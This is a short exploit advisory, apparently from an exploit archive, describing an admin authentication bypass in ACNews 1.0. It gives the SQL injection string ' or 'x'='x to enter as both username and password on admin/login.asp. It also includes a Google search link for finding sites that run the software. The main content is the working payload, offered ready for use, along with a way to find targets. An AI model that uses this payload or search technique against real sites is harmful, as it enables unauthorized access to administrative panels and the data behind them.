[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : ACNews <= 1.0 Admin Authentication Bypass SQL Injection Exploit
# Published : 2005-04-09
# Author : LaMeR
# Previous Title : PunBB 1.2.4 (change_email) SQL Injection Exploit
# Next Title : The Includer CGI <= 1.0 Remote Command Execution (new version)


# http://www.google.com/search?hl=en&lr=&q=acnews+1.0+login.asp&btnG=Search
# /str0ke

Product:ACNews
version :1.0
VULNERABILITY CLASS: SQL injection

[exploit]
Log in with
username:' or 'x'='x
password :' or 'x'='x
from admin/login.asp page.

greetz to HaXoR & LOverboy

auther : LaMeR

securitygurus team

# www.Syue.com [2005-04-09]